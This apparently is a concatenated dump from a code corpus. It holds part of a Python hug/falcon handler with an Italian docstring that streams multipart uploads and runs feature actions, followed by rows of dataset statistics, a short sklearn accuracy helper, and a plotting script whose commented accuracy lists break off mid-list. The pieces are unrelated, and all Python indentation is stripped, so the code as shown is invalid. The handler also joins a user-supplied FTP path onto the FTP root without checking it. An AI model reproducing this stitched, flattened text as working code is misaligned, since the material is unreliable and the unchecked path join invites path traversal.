parser.register(k, target)
values[k] = filepath
toremove.append(filepath)
else:
target = ValueTarget()
parser.register(k, target)
values[k] = target
def removetempfiles(toremove):
for v in toremove:
try:
os.unlink(v)
except FileNotFoundError as e:
pass
while True:
chunk = request.stream.read(8192)
if not chunk:
break
parser.data_received(chunk)
kwargs = {}
for k, w in values.items():
model = schema["fields"][k]
if model == "LocalFile":
#v = os.path.exists(w) and str(w) or None
v = str(w)
elif model == "FTPPath":
v = unquote(w.value.decode("utf8")) or None
if v is not None:
v=str(Path(conf['ftproot'],v))
else:
v = unquote(w.value.decode("utf8")) or None
kwargs[k] = v
m = [m for m in schema["required"] if kwargs[m] is None]
if m.__len__():
out.status = falcon.HTTP_BAD_REQUEST
out.message = f"Required parameters {m} not supplied"
out.format(request=request, response=response)
removetempfiles(toremove)
return
# CHECKS request checks ALL RIGHT. Continuing with code loading
# Trying to initialize feature action manager module
try:
result = featobj.execAction(action,**kwargs)
except AttributeError as e:
traceback.print_exc()
out.status = falcon.HTTP_NOT_IMPLEMENTED
out.message = f"Action '{action}' not implemented."
out.format(request=request, response=response)
removetempfiles(toremove)
return
except Exception as e:
traceback.print_exc()
out.status = falcon.HTTP_BAD_REQUEST
out.message = f"Action values error: {e}."
out.format(request=request, response=response)
removetempfiles(toremove)
return
try:
db["actions"][feature,action,result['timestamp']]={"value":result}
out.format(request=request, response=response)
except KeyError as e:
traceback.print_exc()
out.status = falcon.HTTP_INTERNAL_SERVER_ERROR
out.message = str(e)
out.format(request=request, response=response)
except ValueError as e:
traceback.print_exc()
out.status = falcon.HTTP_BAD_REQUEST
out.message = str(e)
out.format(request=request, response=response)
removetempfiles(toremove)
return
@hug.put("/{feature}/{action}", parse_body=False)
@hug.default_input_format(content_type="multipart/form-data")
def update_action(feature, action, request=None, response=None):
"""
**Esecuzione delle azioni**
Richiede l'esecuzione di una specifica azione su una feature, fornendo tutte le informazioni \
necessarie attraverso una form dinamica dedicata.
- Oltre ai due parametri `feature` e `form`, `timestamp`, indicati nella url, accetta un \
_multipart/form-data_ basato sulla specifica form, selezionata tramite i due parametri espliciti.
- Tutto il content è scaricato attarverso i chunk dello stream ('100 continue') per evitare il \
timeout dei workers in caso di contenuti di grandi dimensioni.
Possibili risposte:
- _200 OK_: Nel caso in cui l'azione vada a buon fine. L'azione richiesta viene presa in carico ma \
potrebbe avere un tempo di esecuzione arbitrario. L'azione quindi viene splittata su un altro processo.
- _404 Not Found_: Nel caso la feature non esista o non sia definita per essa l'azione richiesta.
- _500 Internal Server Error_: Nel caso pessimo che il modulo dichiarato non esista.
- _501 Not Implemented'_: Nel caso la tipologia non fornisse ancora l'iplementazione di uno o tutti \
i moduli di gestione
E' stato implementato il meccanismo minimo di gestione che prevede il salvataggio delle info \
fornite che possono essere fornite tali e quali in uscita (vedi metodo GET dell'api). Questo \
meccanismo permette di svluppare i moduli a partire da un template con risposta di default.
"""
out = ResponseFormatter()
# Trying to manage income feature request and its prototype configuration
try:
featobj = sourceman.sourceFactory(feature)
except KeyError as e:
traceback.print_exc()
out.status = falcon.HTTP_NOT_FOUND
out.message = f"feature '{feature}' does not exists or it is misconfigured: {e}"
out.format(request=request, response=response)
return
try:
schema=featobj.getActionSchema(action)
except KeyError as e:
traceback.print_exc()
out.status = falcon.HTTP_NOT_IMPLEMENTED
out.message = f"Prototype '{featobj.type}' actions not implemented."
out.format(request=request, response=response)
return
except ModuleNotFoundError as e:
traceback.print_exc()
out.status = falcon.HTTP_INTERNAL_SERVER_ERROR
out.message = f"Prototype '{featobj.type}' module not found."
out.format(request=request, response=response)
return
parser = StreamingFormDataParser(headers=request.headers)
values = {}
toremove = []
# TODO Differenziazione delle tipologie di input
for k, w in schema["fields"].items():
if w == "LocalFile":
timenow = time.perf_counter()
filepath = Path(
tempfile.gettempdir(), f"{feature}.{k}.{timenow}.part"
)
target = FileTarget(filepath)
parser.register(k, target)
values[k] = filepath
toremove.append(filepath)
else:
target = ValueTarget()
parser.register(k, target)
values[k] = target
def removetempfiles(toremove):
for v in toremove:
try:
os.unlink(v)
except FileNotFoundError as e:
pass
while True:
chunk = request.stream.read(8192)
if not chunk:
break
parser.data_received(chunk)
kwargs = {}
for k, w in values.items():
model = schema["fields"][k]
if model == "LocalFile":
#v = os.path.exists(w) and str(w) or None
v = str(w)
elif model == "FTPPath":
v = unquote(w.value.decode("utf8")) or None
if v is not None:
v=str(Path(conf['ftproot'],v))
else:
v = unquote(w.value.decode("utf8")) or None
kwargs[k] = v
# CHECKS request checks ALL RIGHT. Continuing with code loading
# Trying to initialize feature action manager module
try:
result = featobj.updateAction(action,**kwargs)
except AttributeError as e:
traceback.print_exc()
out.status = falcon.HTTP_NOT_IMPLEMENTED
out.message = f"Action '{action}' not implemented."
out.format(request=request, response=response)
removetempfiles(toremove)
return
except Exception as e:
traceback.print_exc()
out.status = falcon.HTTP_BAD_REQUEST
out.message = f"Action values error: {e}."
out.format(request=request, response=response)
removetempfiles(toremove)
return
try:
db["actions"][feature,action,result['timestamp']]=None
except Exception:
pass
try:
db["actions"][feature,action,result['timestamp']]={"value":result}
out.format(request=request, response=response)
except KeyError as e:
traceback.print_exc()
out.status = falcon.HTTP_INTERNAL_SERVER_ERROR
out.message = str(e)
out.format(request=request, response=response)
except ValueError as e:
traceback.print_exc()
out.status = falcon.HTTP_BAD_REQUEST
out.message = str(e)
out.format(request=request, response=response)
removetempfiles(toremove)
return
| 35.20936
| 103
| 0.664498
| 1,747
| 14,295
| 5.364625
| 0.194619
| 0.032864
| 0.051643
| 0.070423
| 0.841656
| 0.82309
| 0.82309
| 0.82309
| 0.82309
| 0.811566
| 0
| 0.00473
| 0.24575
| 14,295
| 405
| 104
| 35.296296
| 0.864496
| 0.325149
| 0
| 0.84585
| 0
| 0
| 0.099006
| 0.005861
| 0
| 0
| 0
| 0.009877
| 0
| 1
| 0.027668
| false
| 0.011858
| 0.059289
| 0
| 0.158103
| 0.063241
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6d85e96296e63d9423bcdab0d9951464cb67ee32
| 140
|
py
|
Python
|
src/utils/evaluator.py
|
bekirufuk/long_doc_classification
|
5777ce7fc3cc7150c12ca58cc12cf2d691656219
|
[
"MIT"
] | null | null | null |
src/utils/evaluator.py
|
bekirufuk/long_doc_classification
|
5777ce7fc3cc7150c12ca58cc12cf2d691656219
|
[
"MIT"
] | null | null | null |
src/utils/evaluator.py
|
bekirufuk/long_doc_classification
|
5777ce7fc3cc7150c12ca58cc12cf2d691656219
|
[
"MIT"
] | null | null | null |
from sklearn.metrics import accuracy_score
def compute_metrics(references, predictions):
return accuracy_score(references, predictions)
| 35
| 50
| 0.842857
| 16
| 140
| 7.1875
| 0.6875
| 0.226087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 140
| 4
| 50
| 35
| 0.912698
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
6d9a00f8b3170bdc633e550bb59a89a3829368f8
| 60,621
|
py
|
Python
|
plot.py
|
TylerCools/thesis
|
8195ca3b8658bdd10f4ce38c6b50cd2bbedd3e57
|
[
"MIT"
] | null | null | null |
plot.py
|
TylerCools/thesis
|
8195ca3b8658bdd10f4ce38c6b50cd2bbedd3e57
|
[
"MIT"
] | null | null | null |
plot.py
|
TylerCools/thesis
|
8195ca3b8658bdd10f4ce38c6b50cd2bbedd3e57
|
[
"MIT"
] | null | null | null |
from matplotlib import pyplot as plt
# Task 1
# y1 = [0.4516509433962264, 0.7894204851752021, 0.8288409703504043, 0.8320417789757413, 0.8431603773584906, 0.8529312668463612, 0.9371630727762803, 0.9836590296495957, 0.996967654986523, 0.996967654986523, 0.996967654986523, 0.996967654986523, 0.996967654986523, 0.996967654986523, 0.9962938005390836, 0.9962938005390836, 0.9962938005390836, 0.9962938005390836, 0.9962938005390836, 0.9962938005390836, 0.9979784366576819, 0.9979784366576819, 0.9979784366576819, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9981469002695418, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9983153638814016, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008, 0.9991576819407008] #
# y1_Mem = [0.5139824797843666, 0.8340633423180593, 0.8965633423180593, 0.9518194070080862, 0.9905660377358491, 0.9973045822102425, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803, 0.9996630727762803]
# y1_mem_oov = [0.5875415282392027, 0.7596345514950166, 0.7727574750830565, 0.7887043189368771, 0.7920265780730897, 0.795016611295681, 0.7948504983388704, 0.7935215946843854, 0.7897009966777409, 0.7827242524916943, 0.792358803986711, 0.779734219269103, 0.7888704318936877, 0.7926910299003322, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216, 0.7925249169435216]
# Task 2
# y2 = [0.7871935756551142, 0.8361158072696534, 0.915469146238377, 0.9922865595942519, 0.9994716821639898, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918, 0.9995773457311918]
# y2_mem_oov = [0.786046511627907, 0.7883720930232558, 0.7883720930232558, 0.787737843551797, 0.7881606765327696, 0.7882663847780127, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421, 0.7885835095137421]
# Task 3
# y3 = [0.6478338989818327, 0.6818726292673188, 0.6994410061888601, 0.7390696745857457, 0.757236973447794, 0.7827909762427631, 0.8034537831902575, 0.8456777799960072, 0.8630465162707127, 0.8820123777201038, 0.9033739269315233, 0.9092633260131763, 0.9096626073068477, 0.9247354761429427, 0.9255340387302855, 0.9297264923138351, 0.9419045717708125, 0.9457975643841086, 0.9498901976442403, 0.9557795967258934, 0.9661609103613495, 0.9669594729486923, 0.9669594729486923, 0.9676582152126173, 0.9659612697145139, 0.9659612697145139, 0.9745458175284488, 0.9772409662607306, 0.9795368336993412, 0.9795368336993412, 0.9807346775803554, 0.9807346775803554, 0.9807346775803554, 0.9807346775803554, 0.9807346775803554, 0.9834298263126372, 0.9834298263126372, 0.9834298263126372, 0.9834298263126372, 0.9834298263126372, 0.9834298263126372, 0.9844280295468157, 0.9844280295468157, 0.9845278498702336, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9850269514873228, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 0.9863246156917549, 